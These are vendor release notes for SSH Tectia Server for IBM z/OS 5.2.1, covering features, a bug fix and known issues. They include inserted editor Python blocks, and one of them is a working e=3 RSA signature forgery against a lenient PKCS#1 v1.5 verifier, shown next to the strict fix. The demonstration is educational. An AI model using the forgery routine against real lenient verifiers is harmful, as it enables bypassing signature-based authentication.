Release Notes for SSH Tectia Server for IBM z/OS 5.2.1

26 September 2006

(C) 2006 SSH Communications Security Corp. This software is protected by
international copyright laws. All Rights Reserved.

Table of Contents

1. About This Release
   1.1 Product Name Change
   1.2 The SSH Tectia Client/Server Solution
   1.3 SSH Tectia Server for IBM z/OS 5.2
   1.4 The SSH Tectia Client Module on z/OS
2. CD Contents
   2.1 Binaries
   2.2 Documentation
3. Key New Features in Version 5.2
4. Bug Fixes
5. Known Issues
6. Further Information

********************************************************************
NOTE
********************************************************************
Please read the license agreement located in the CD-ROM root before
installing the software. Should you have any questions, please contact
ssh.sales@ssh.com or your sales representative.
********************************************************************
********************************************************************

Please refer to the SSH Tectia Server for IBM z/OS Administrator Manual
for instructions on installing and removing the software.

1. About This Release

1.1 Product Name Change

Release 5.2 introduced a change in product naming: SSH Tectia Server (M)
is renamed SSH Tectia Server for IBM z/OS.

1.2 The SSH Tectia Client/Server Solution

The SSH Tectia client/server solution is an end-to-end communications
security solution for multi-platform environments. It is based on the
Secure Shell technology from the original developers.
The SSH Tectia client/server solution consists of four product modules:

  * SSH Tectia Server
  * SSH Tectia Server for IBM z/OS
  * SSH Tectia Client
  * SSH Tectia Connector

The product modules are expandable with the following add-on packs:

  * EFT Expansion Pack for SSH Tectia Server
  * EFT Expansion Pack for SSH Tectia Client
  * Tunneling Expansion Pack for SSH Tectia Server

SSH Tectia Server provides secure terminal, secure file transfer, and
tunneling server functionality for system administrators and other users
of SSH Tectia Client.

SSH Tectia Server with EFT Expansion Pack provides a secure file transfer
server to be used in conjunction with SSH Tectia Client with EFT Expansion
Pack, enabling secure and reliable high-performance file transfers in
heterogeneous enterprise environments.

SSH Tectia Client with EFT Expansion Pack provides client-side SFTP
(Secure File Transfer Protocol) APIs, a GUI, and command-line tools for
securing non-interactive and automated file transfers. It has been
specifically designed for use with SSH Tectia Server with EFT Expansion
Pack and with SSH Tectia Server for IBM z/OS.

SSH Tectia Server with Tunneling Expansion Pack provides tunneling server
functionality for users of SSH Tectia Connector, and secure terminal and
secure file transfer functionality for users of SSH Tectia Client.

SSH Tectia Connector is designed to work exclusively with SSH Tectia
Server with Tunneling Expansion Pack and with SSH Tectia Server for IBM
z/OS, providing completely transparent secure application connectivity
without any user intervention.

SSH Tectia Server for IBM z/OS includes the key functionality of both the
server-side EFT Expansion Pack and the server-side Tunneling Expansion
Pack.
1.3 SSH Tectia Server for IBM z/OS 5.2

SSH Tectia Server for IBM z/OS 5.2 is designed for securing IBM z/OS
mainframe connectivity. It provides tunneling server functionality for
users of SSH Tectia Connector, and secure terminal and secure file
transfer functionality for users of SSH Tectia Client.

SSH Tectia Server for IBM z/OS 5.2 provides secure system administration,
enabling system administrators to remotely administer application servers
and other resources over a secure connection, so that IT security
administrators can manage dispersed resources without the system
administration infrastructure itself becoming a point of compromise.

For secure file transfers between IBM z/OS systems, and between IBM z/OS
and distributed hosts, SSH Tectia Server for IBM z/OS 5.2 provides a
secure file transfer server to be used in conjunction with SSH Tectia
Client with EFT Expansion Pack, or with other Secure Shell clients,
enabling secure and reliable high-performance file transfers in
heterogeneous enterprise environments. The server supports direct secure
file transfers to and from the MVS file system and performs the codeset
translation.

In addition, SSH Tectia Server for IBM z/OS 5.2 allows large enterprises
to begin securing their corporate business applications using SSH Tectia
with minimal desktop software investment. It combines SSH secure system
administration with transparent application tunneling for TN3270 users
through SSH Tectia Connector, client software that is completely
transparent to the user and enables secure application connectivity
without any user intervention.

1.4 The SSH Tectia Client Module on z/OS

The client module is designed for securing IBM z/OS mainframe
connectivity and provides enhanced usability and features especially for
secure file transfer between IBM z/OS systems, and between IBM z/OS and
distributed hosts.
The client provides support for direct secure file transfers to and from
the MVS file system and performs the codeset translation without staging
the file.

Profiles can be used to significantly improve usability and the user
experience: profiles for different host and file types can be defined at
server and/or user level. The default profile also supports
profile-defined ASCII-EBCDIC translation when using the SSH Tectia Client
GUI drag-and-drop functionality.

More information on the key features of SSH Tectia Server for IBM z/OS
5.2 can be found in Section 3 and in the Administrator Manual.

2. CD Contents

Please refer to the SSH Tectia Server for IBM z/OS Administrator Manual
for details on the installation packages and for step-by-step
instructions on how to install the product in the IBM z/OS environment.

2.1 Binaries

The latest binaries are version 5.2.1.

  install/zos/
      Installation package for IBM z/OS.

2.2 Documentation

  index.html
      The CD contents front page.

  license.html, license.txt
      The license agreement in HTML and text formats.

  releasenotes.txt
      This file.

  doc/SSHTectiaServer_M_ProductDescription.pdf,
  doc/SSHTectiaServer_M_ProductDescription_html/index.html
      Product Description for the SSH Tectia client/server solution in
      PDF and HTML formats.

  doc/SSHTectiaServer_M_AdminManual.pdf,
  doc/SSHTectiaServer_M_AdminManual_html/index.html
      Administrator Manual for SSH Tectia Server for IBM z/OS in PDF and
      HTML formats.

3. Key New Features in Version 5.2

Version 5.2.1 of SSH Tectia Server for IBM z/OS is a maintenance release
and contains no new features.

Version 5.2.0 of SSH Tectia Server for IBM z/OS contains the following
new features and enhancements:

  * Direct streaming transfers of MVS datasets on the server module:
    - Direct read and write access to MVS datasets during file transfers,
      in a single step.
    - The new protocol extensions do not require any additional memory or
      disk staging when MVS transfers are initiated from SSH Tectia
      Clients on Windows, Unix, and Linux platforms. Direct streaming on
      the server module requires SSH Tectia Client 5.2 with EFT Expansion
      Pack. Direct streaming on the SSH Tectia Server for IBM z/OS client
      module has been supported since version 5.1.

  * New MVS dataset listing functionality:
    - Users can interactively list datasets with the GUI or command-line
      tools.
    - Easy "files and folders" style dataset listings and drag-and-drop
      file transfers with SFTP GUI file transfer clients.
    - The 'cd' and 'ls' commands for navigating and listing MVS datasets
      with the command-line tools.

  * New MVS dataset read-write support: SFTP GUI drag-and-drop file
    transfer support for MVS datasets, with codeset and file format
    conversion based on user-level configurable transfer profiles.

  * Server-side support for APPEND mode file transfers. This requires SSH
    Tectia Client 5.2 with EFT Expansion Pack.

  * Optimized server internal operations for MVS datasets. Support for
    parallel file transfers within one connection.

  * Comprehensive set of dataset parameters during dataset allocation.

  * Compatibility mode for third-party and older clients.

  * Server-side support for new features incorporated into the SSH Tectia
    clients in non-mainframe environments:
    - FTP-SFTP conversion for seamless and transparent conversion of
      unsecured FTP transfers into secure SFTP without the need to modify
      scripts, applications, or operations (when used in conjunction with
      SSH Tectia Client 5.1 with EFT Expansion Pack).

See the SSH Tectia Server for IBM z/OS Administrator Manual and the man
pages for more specific configuration options.

4. Bug Fixes

The following bug in SSH Tectia Server (M) 5.2.0 has been fixed:

  - Fixed an RSA signature forgery vulnerability in the SSH Tectia
    Client, Connector, Server, and Manager products. CERT reference
    number: VU#845620.
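The notes only record that the forgery flaw was fixed. For readers who want to see what the CERT note VU#845620 is about, the following Python block, added here by the editor and not SSH Tectia code, demonstrates the bug class that note covers: an RSA PKCS#1 v1.5 verifier that walks past the padding and compares the DigestInfo but never examines the bytes after it, so that with public exponent e = 3 an attacker can produce a "signature" by taking an integer cube root, without the private key. The modulus is a constructed 2048-bit odd integer, not a real key (the forgery works against any modulus of that size); the SHA-1 DigestInfo prefix is the one listed in RFC 3447 section 9.2. Nothing here describes the internals of the Tectia defect, only the lenient check beside the strict one that fixes it.

```python
import hashlib
import hmac

# Editor's illustration, not SSH Tectia code.  Constructed, not a real key:
# a fixed 2048-bit odd integer serves as the modulus, because the e=3 forgery
# below never needs a valid key pair.
E = 3
K = 256                                    # modulus size in bytes
N = (1 << 2047) | int.from_bytes(hashlib.sha256(b"constructed").digest() * 8, "big") | 1

# DER DigestInfo prefix for SHA-1 (RFC 3447, section 9.2, note 1).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info(message: bytes) -> bytes:
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(message).digest()


def _encoded_message(sig: bytes) -> bytes:
    """RSA public operation: EM = sig^e mod N as a K-byte big-endian string."""
    return pow(int.from_bytes(sig, "big"), E, N).to_bytes(K, "big")


def verify_lenient(message: bytes, sig: bytes) -> bool:
    """The buggy pattern: skip 00 01 FF..FF 00, compare the DigestInfo, and
    never look at what follows it.  Neither the number of FF bytes nor the
    trailing bytes are checked, which is exactly what the forgery exploits."""
    em = _encoded_message(sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i >= K or em[i] != 0x00:
        return False
    i += 1
    di = digest_info(message)
    return em[i:i + len(di)] == di        # BUG: bytes after the digest are ignored


def verify_strict(message: bytes, sig: bytes) -> bool:
    """The fix: rebuild the single valid encoding and compare it whole."""
    di = digest_info(message)
    expected = b"\x00\x01" + b"\xff" * (K - len(di) - 3) + b"\x00" + di
    return hmac.compare_digest(_encoded_message(sig), expected)


def icbrt_ceil(x: int) -> int:
    """Smallest integer s with s**3 >= x (integer Newton iteration from above)."""
    if x <= 0:
        return 0
    s = 1 << ((x.bit_length() + 2) // 3)  # 2**ceil(bits/3) >= cbrt(x)
    while True:
        t = (2 * s + x // (s * s)) // 3
        if t >= s:
            break
        s = t
    return s if s ** 3 >= x else s + 1


def forge(message: bytes, ff_count: int = 8) -> bytes:
    """Bleichenbacher-style e=3 forgery: place a valid-looking prefix in the
    high bytes, zeros below it, and take the integer cube root rounded up.
    Rounding only disturbs the low-order zero region, which the lenient
    verifier ignores, and s**3 < N so no modular reduction occurs."""
    prefix = b"\x00\x01" + b"\xff" * ff_count + b"\x00" + digest_info(message)
    block = int.from_bytes(prefix + b"\x00" * (K - len(prefix)), "big")
    return icbrt_ceil(block).to_bytes(K, "big")


if __name__ == "__main__":
    msg = b"constructed message"
    sig = forge(msg)
    print("lenient verifier accepts forgery:", verify_lenient(msg, sig))
    print("strict verifier accepts forgery: ", verify_strict(msg, sig))
```

The strict verifier is the only one that should survive review: it compares the full K-byte encoding in constant time, so the padding length, the zero separator and every trailing byte are all checked at once.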
5. Known Issues

The following issues are currently known in SSH Tectia Server for IBM
z/OS 5.2.1:

  - The 'ssh2' client does not work if su is used before establishing the
    ssh2 connection. The error output depends on the terminal used and
    on the kind of su performed before the ssh2 connection attempt. You
    may see the error message

      BPX015I HFS PROGRAM ssh2 IS NOT MARKED PROGRAM CONTROLLED.

    ssh2 does not need to be program-controlled; instead, avoid using su
    before starting ssh2. (Will be fixed in 5.2.2.)

  - Neither SSH Tectia Server (M) 5.1 nor SSH Tectia Server for IBM z/OS
    5.2 supports authentication using certificates. (Will be fixed in
    5.3.0.)

  - ssh2 hangs when run from the TSO OMVS shell. Passwords and
    passphrases cannot be entered in the OMVS shell. To run client
    programs under TSO in the OMVS shell, use public-key authentication:
    either use a private key without a passphrase, or run 'ssh-agent2'
    and 'ssh-add2' in a telnet or 'ssh2' shell and export the
    SSH2_AUTH_SOCK variable in OMVS. (Will be fixed in 5.2.2.)

  - If TCPIP is stopped while the server is running, the server may enter
    a tight CPU loop. Stop 'sshd2' before stopping TCPIP.

  - Message and debug output from the server 'sshd2' is shown correctly
    when sshd2 is run from a USS command prompt and when it is sent to a
    client program. However, when the output is redirected to a file,
    piped to a process, or written directly to an HFS file, the output is
    in ASCII although it should be in EBCDIC. Output is written directly
    to an HFS file when sshd2 is run as a started task. (Will be fixed in
    5.2.2.)

    Workaround 1: View the output with a command that converts the
    contents to EBCDIC, e.g.:

      iconv -f ISO8859-1 -t IBM-1047 /home/SSHD2/sshd2.err | less

    Workaround 2: Tag the file as EBCDIC before running sshd2, e.g.:

      chtag -t -c 1047 /home/SSHD2/sshd2.err

    or tag the file as ASCII after running sshd2, e.g.:

      chtag -t -c 819 /home/SSHD2/sshd2.err

  - The 'uninstall.sh' script leaves some files in '/etc/ssh2/' and
    '/usr/lpp/ssh2/'. (Will be fixed in 5.2.2.)
  - Some client messages use a different character encoding. Some
    messages from 'ssh2', 'scp2', and 'sftp2' are written to the terminal
    in ASCII.

  - A one-shot ssh2 tunnel does not close. When 'ssh2' is used to forward
    a local port in single-shot mode ('-fo'), it does not close the
    tunnel after the connecting application has exited. (Will be fixed
    in 5.2.2.)

  - scp2 and sftp2 use a random home directory. If 'ssh2', 'scp2' or
    'sftp2' is run as a user with user ID 0, the system selects the home
    directory randomly from the list of all users with user ID 0. This
    may cause authentication to fail, because the keys found there may
    not be the right ones. As a workaround, the command-line option -i
    can be used to specify the correct user identity file. (Will be fixed
    in 5.3.0.)

  - The package installs the ssh-certd startup script. 'setup.sh'
    installs the ssh-certd startup script even though ssh-certd is not
    part of the package. (Will be fixed in 5.3.0.)

  - In SSH Tectia Server for IBM z/OS 5.2.1, dataset listing is provided
    only by the SFTP server; the 'sftp2' client does not have this
    feature on its own. To list datasets on z/OS, connect to the local
    SFTP server:

      sftp2 localhost
      sftp> cd /_
      sftp> ls -l

  - sft-server-g3 parses the advice string in the sftp2 cd command
    incorrectly. If a file transfer advice string is added to the sftp2
    cd command, the server parses it incorrectly and returns a wrong path
    to the client. (Will be fixed in 5.2.2.)

  - sft-server-g3 shows a wrong size in dataset listings for datasets
    larger than 2 GB. (Will be fixed in 5.2.2.)

  - The ftadv parameter VOLUMES cannot be a comma-separated list of
    volumes. The file transfer advice parameter VOLUMES must be a plus
    sign (+) separated list of volume names. (Will be fixed in 5.2.2.)

  - scp2 removes the backslash from the username. If the username is
    given with a Windows domain (DOMAIN\user), scp2 removes the '\'
    character and authentication fails. (Will be fixed in 5.2.2.)

  - Ability to use MVS datasets as sftp2 batch files.
    sftp2 cannot currently use MVS datasets as batch files. (Will be
    fixed in 5.2.2.)

  - Advice string parameters are not honored: the file transfer
    parameter X (TRANSFER_MODE) has the wrong default. If X is not given,
    the file transfer defaults to binary even when C and D are present.
    The correct behavior is that if C and D are given and X is absent,
    codeset conversion is performed; only if X=BIN is explicitly
    specified does no codeset conversion take place. (Will be fixed in
    5.2.2.)

  - An FB dataset cannot be allocated.

    Problem: Datasets are always created with RECFM=VB and LRECL=1024,
    despite other attributes in the FTADV string, when a client program
    (scp2 or sftp2) is run from JCL.

    Description: This problem has only been seen on one system, which
    was running z/OS 1.6. If you see this problem when running a command
    such as

      BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 +
        user@host:textfile.txt +
        /ftadv:O=FB,R=80,T=PS/__FB80.JOHAN2

    turn on debug output for the advisor script by adding

      -D *Advisor=99 +

    to the command. If the debug output contains the error message
    'BPXW9044I spawn for bpxwrtso failed', you have this problem.

    Fix: Add this line to the environment variable file (DD name
    STDENV):

      _BPX_SHAREAS=NO

  - Datasets cannot be addressed in the /_ format without spelling out
    the user prefix. In JCL, a dataset cannot be addressed by a name that
    relies on the user prefix being added if the dataset path includes a
    file transfer advice string. For example, the following does not
    work:

      BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 -D 7+
        -oallowedauthentications=publickey +
        user@host:testfile.txt +
        /FTADV:C=ISO8859-1,D=IBM-1047/__WEBEX.FILE1

    The workaround is to use an absolute dataset path:

      BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 -D 7+
        -oallowedauthentications=publickey +
        user@host:testfile.txt +
        /FTADV:C=ISO8859-1,D=IBM-1047/___USER.WEBEX.FILE1

    (Will be fixed in 5.2.2.)

  - Mismatched DD names do not cause an error message. When a file name
    of the form //DD:NAME is used in an scp2 command, it is intended to
    refer to a DD statement in the JCL.
    If the DD statement is missing, or its name does not match the name
    in the command, no error is reported; instead the client accesses an
    HFS file named DD:NAME. (Will be fixed in 5.2.2.)

  - REFDD does not work. Use the LIKE parameter instead. (Will be fixed
    in 5.2.2.)

  - sftp2 mput to a PDS creates empty files. (Will be fixed in 5.2.2.)

  - Incorrect error message for file not found. (Will be fixed in
    5.2.2.)

  - Starting an FTP tunnel kills the session or fails with an error. FTP
    tunneling cannot be used in an interactive sh shell. Use another
    shell such as tcsh or bash, or use a non-interactive session for FTP
    tunneling.

  - File tags on files transferred to HFS are unset. If files are
    transferred in binary mode, sft-server-g3 does not set the file tag
    (binary/EBCDIC/ASCII). (Will be fixed in 5.3.0.)

  - The file transfer server reports memory leaks to the client. (Will
    be fixed in 5.2.2.)

  - The sftp server's chmod sets permissions incorrectly when given
    non-numeric (symbolic) arguments. Use numeric arguments, e.g.

      chmod 755 file

    (Will be fixed in 5.2.2.)

  - The UNIT parameter does not work with device numbers.

  - Remote command output is garbage in JCL. When ssh2 is run with a
    remote command from JCL, the command output is in ASCII and prints as
    garbage. (Will be fixed in 5.2.2.)

  - The file is not truncated when the OpenSSH sftp client is used. The
    original file is not truncated when the OpenSSH sftp client is used
    to overwrite a larger existing file. (Will be fixed in 5.2.2.)

  - Some sftp2 commands do not work with DD names. Creating, reading and
    overwriting local data sets allocated by JCL DD statements is now
    supported in the scp2 and sftp2 command-line client programs
    (earlier only creating data sets worked). The following sftp2
    commands are not supported when the file name is a DD name:
      - remove (lrm and rm)
      - rename
      - mkdir
      - rmdir
    (Will be fixed in 5.2.2.)
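Several entries in the list above concern the file transfer advice (FTADV) element of a dataset path: the intended TRANSFER_MODE default, the plus-separated VOLUMES list, the /__ and /___ dataset spellings, and //DD: names that silently fall through to an HFS file. The following Python block is an editor's example, not part of SSH Tectia, that parses the spellings appearing on this page and applies the rules as the notes state they should work. It assumes, from the two JCL examples, that two leading underscores denote a dataset name to be completed with the user prefix and three a fully qualified name; that "/_" alone is the dataset root used for listings; and that the only advice keys are those this page uses (C, D, X, O, R, T, VOLUMES). The dataset-name check is the basic MVS qualifier syntax, and the DD check at the end is the error the notes say 5.2.1 lacks.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Editor's example, not SSH Tectia code.  Models only what this page shows:
# an optional "/ftadv:K=V,K=V" element followed by the target path.
ADVICE_RE = re.compile(r"^/ftadv:(?P<params>[^/]*)(?P<rest>/.*)$", re.IGNORECASE)
QUALIFIER = r"[A-Z@#$][A-Z0-9@#$-]{0,7}"          # basic MVS qualifier syntax
DATASET_NAME_RE = re.compile(
    "^" + QUALIFIER + r"(\." + QUALIFIER + r")*(\([A-Z@#$][A-Z0-9@#$]{0,7}\))?$",
    re.IGNORECASE)


@dataclass
class Target:
    kind: str                      # "dataset", "dataset-root", "dd" or "hfs"
    name: str                      # dataset name, DD name or HFS path
    qualified: bool = False        # assumption: "/___NAME" = no user prefix added
    advice: Dict[str, str] = field(default_factory=dict)

    @property
    def volumes(self) -> List[str]:
        # VOLUMES is a plus-separated list; the comma form is the known issue.
        v = self.advice.get("VOLUMES")
        return v.split("+") if v else []


def _parse_advice(params: str) -> Dict[str, str]:
    advice: Dict[str, str] = {}
    for item in filter(None, params.split(",")):
        if "=" not in item:
            # "VOLUMES=VOL1,VOL2" arrives here as the bare item "VOL2".
            raise ValueError(f"advice item {item!r} has no '='; list values such "
                             "as VOLUMES must be separated with '+', not ','")
        key, value = item.split("=", 1)
        advice[key.upper()] = value
    return advice


def _dataset(name: str, qualified: bool, advice: Dict[str, str]) -> Target:
    if not DATASET_NAME_RE.match(name):
        raise ValueError(f"{name!r} is not a valid MVS dataset name")
    return Target("dataset", name.upper(), qualified, advice)


def parse_target(spec: str) -> Target:
    advice: Dict[str, str] = {}
    rest = spec
    m = ADVICE_RE.match(spec)
    if m:
        advice = _parse_advice(m.group("params"))
        rest = m.group("rest")
    if rest == "/_":                          # "cd /_" lists datasets
        return Target("dataset-root", "", advice=advice)
    if rest.startswith("/___"):               # fully qualified (assumption)
        return _dataset(rest[4:], True, advice)
    if rest.startswith("/__"):                # user prefix added (assumption)
        return _dataset(rest[3:], False, advice)
    if rest.upper().startswith("//DD:"):      # JCL DD statement
        return Target("dd", rest[5:].upper(), advice=advice)
    return Target("hfs", rest, advice=advice)


def transfer_mode(advice: Dict[str, str]) -> Tuple[str, Optional[str], Optional[str]]:
    """Intended rule from the known-issues list: X=BIN means no conversion;
    otherwise, if both C (client codeset) and D (dataset codeset) are given,
    convert C -> D; with no codesets the transfer is binary."""
    if advice.get("X", "").upper() == "BIN":
        return ("binary", None, None)
    if "C" in advice and "D" in advice:
        return ("convert", advice["C"], advice["D"])
    return ("binary", None, None)


def transfer_mode_5_2_1(advice: Dict[str, str]) -> Tuple[str, Optional[str], Optional[str]]:
    """The 5.2.1 default the notes call a bug: without an explicit X the
    transfer is binary even when C and D are present.  (What a non-BIN X does
    is not described on the page; it is treated as 'convert' here.)"""
    if "X" not in advice or advice["X"].upper() == "BIN":
        return ("binary", None, None)
    if "C" in advice and "D" in advice:
        return ("convert", advice["C"], advice["D"])
    return ("binary", None, None)


def resolve_dd(target: Target, allocated_dds: Set[str]) -> str:
    """The check the notes say 5.2.1 lacks: a //DD:NAME target whose DD is not
    allocated must be an error, not a fall-through to an HFS file 'DD:NAME'."""
    if target.kind != "dd":
        raise ValueError("not a DD target")
    if target.name not in {d.upper() for d in allocated_dds}:
        raise LookupError(f"DD {target.name} is not allocated in this job step")
    return target.name


if __name__ == "__main__":
    t = parse_target("/FTADV:C=ISO8859-1,D=IBM-1047/___USER.WEBEX.FILE1")
    print(t, "intended:", transfer_mode(t.advice), "5.2.1:", transfer_mode_5_2_1(t.advice))
```

Running the block on the second JCL example from the notes shows the difference the TRANSFER_MODE entry describes: the intended rule converts ISO8859-1 to IBM-1047 because both C and D are present, while the 5.2.1 default transfers the file as binary.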
6. Further Information

More information can be found in the man pages and in the SSH Tectia
manuals, which are also available at http://www.ssh.com/support/.

Additional licenses can be purchased from our online store at
http://www.ssh.com/company/sales/store/.